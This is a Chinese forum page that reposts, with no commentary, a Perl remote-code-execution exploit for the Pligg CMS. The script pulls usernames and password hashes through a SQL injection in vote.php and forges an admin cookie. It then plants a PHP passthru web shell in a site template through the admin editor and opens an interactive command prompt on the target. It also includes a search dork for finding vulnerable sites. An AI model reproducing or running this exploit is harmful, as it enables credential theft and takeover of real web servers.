• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    Pligg

    发布者: 荣9319 | 发布时间: 2025-6-28 22:52| 查看数: 81| 评论数: 0|帖子模式

    #!/usr/bin/perl -w
    use LWP::UserAgent;
    use MIME::Base64;
    use Digest::MD5 qw(md5_hex);
    use Getopt::Std; getopts('h:', \%args);

    print "#############################################\n";
    print "# Pligg <= 9.9 Remote Code Execution Exploit \n";
    print "#############################################\n";
    #dork = "owered By Pligg"   "Legal: License and Source"

    # Proxy address
    $ENV{http_proxy} = 'http://127.0.0.1:8118/';

    my $http = LWP::UserAgent->new;
       $http->agent('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1');
       #$http->env_proxy(); # <-- uncomment for proxy
       $http->cookie_jar({});

    my $host = $args{'h'} || usage(); # Host flag. Specify the Pligg root directory
    my $user = undef;
    my $pass = undef;
    my $file = undef;
    my $data = undef;
    my @auth = undef;

    # Details for the php code that is injected in to the template
    my $ereg = '<cmdout>(.*?)<\/cmdout>';
    my $cvar = 'cmd';
    my $cval = 'pwd;id';
    my $code = '<cmdout><?php if ( !empty($_REQUEST["' . $cvar . '"]) ) passthru($_REQUEST["' . $cvar . '"]); ?></cmdout>';

    print "
  • Checking if a shell already exists ...\n";

    $data = $http->post(
    $host . '/index.php',
    [
       $cvar  => $cval
    ]);

    if ( $data->content =~ /$ereg/si )
    {
    print "
  • Found existing shell ...\n";
    }
    else
    {
    print "[!] No existing shell found ...\n";

    #############################################
    # Gather user info via vote.php SQL Injection
    #############################################

    $data = $http->post(
    $host . '/vote.php',
    [
       'id'  => '-99 UNION SELECT 1,2,3,null,5,6,concat(user_login,char(58),user_pass),8,9 FROM pligg_users -- /*',
       'md5' => 'd41d8cd98f00b204e9800998ecf8427e' # <-- If you aren't logged in this always works
    ]);

    print "
  • Gathering user information ...\n";

    if ( $data->content =~ /(.*?)[a-f0-9]{1,64})/i )
    {
    $user = $1;
    $pass = $2;

    # Sets up the cookie to authenticate us
    @auth = ('Cookie' => 'mnm_user=' . $user . '; mnm_key=' . encode_base64($user . ':' . crypt($user, 22) . ':' . md5_hex($pass)) . ';');

    print "[ ] Got user '$user' ...\n";

    }
    else
    {
    print "[!] Unable to get user info. Dumping output ...\n";
    open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);
    exit;
    }

    #############################################
    # Get the template path
    #############################################

    print "
  • Gathering template information ...\n";

    $data = $http->get($host . '/admin_editor.php',@auth);

    if ( $data->content =~ />(.*?)<\/option>/i )
    {
    $file = $1;
    # Quick and dirty fix
    $file =~ s/admin_templates\/admin_access_denied.tpl/footer.tpl/;
    print "[ ] Got template file [$file]...\n";
    }

    #############################################
    # Read the template contents
    #############################################

    $data = $http->post(
    $host . '/admin_editor.php',
    [
       'the_file'  => $file,
       'open' => 'Open'
    ]
    ,@auth);

    print "
  • Reading template data ...\n";

    # Grab the template contents
    if ( $data->content =~ /<textarea(.*)>(.*)<\/textarea>/is )
    {
    $temp = $2;
    $temp =~ s/>/>/ig;
    $temp =~ s/</</ig;
    $temp =~ s/"/"/ig;
    $temp =~ s/&/&/ig;

    print "[ ] Got template data ...\n";
    }
    else
    {
    print "[!] Unable to get template data. Dumping output ...\n";
    open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);
    exit;
    }

    #############################################
    # Update the Template Contents
    #############################################


    $data = $http->post(
    $host . '/admin_editor.php',
    [
       'the_file2'   => $file,
       'updatedfile' => $temp . $code,
       'save'        => 'Save Changes'
    ]
    ,@auth);

    print "
  • Updating template data ...\n";

    if ( $data->content =~ /File Saved/is )
    {
    print "[ ] File saved!\n";
    }
    else
    {
    print "[!] Unable to update template data. Dumping output ...\n";
    open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);
    exit;
    }
    }

    #############################################
    # Setting up the php shell
    #############################################

    print "
  • Setting up shell ...\n";

    $data = $http->post(
    $host . '/index.php',
    [
       $cvar  => $cval
    ]);

    if ( $data->content =~ /<cmdout>(.*?)<\/cmdout>/si )
    {
    while ( 1 )
    {
    print "pligg:~#";
    $exec = <STDIN>;

    $data = $http->post(
    $host . '/index.php',
    [
       $cvar  => $exec
    ]);

    if ( $data->content =~ /$ereg/si )
    {
    print $1 . "\n";
    }
    else
    {
    print "Unexpected Response!\n";
    }
    }
    }
    else
    {
    print "[!] Unable to set up shell ...\n";
    open(ELOG, '>pligg_debug.html');print ELOG $data->content;close(ELOG);
    exit;
    }

    sub usage
    {
    print "pligg_exploit.pl -h http://path/to/pligg     \n";
    exit;
    }


    来源:https://www.jb51.net/hack/5734.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
  • 最新评论

    浏览过的版块

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表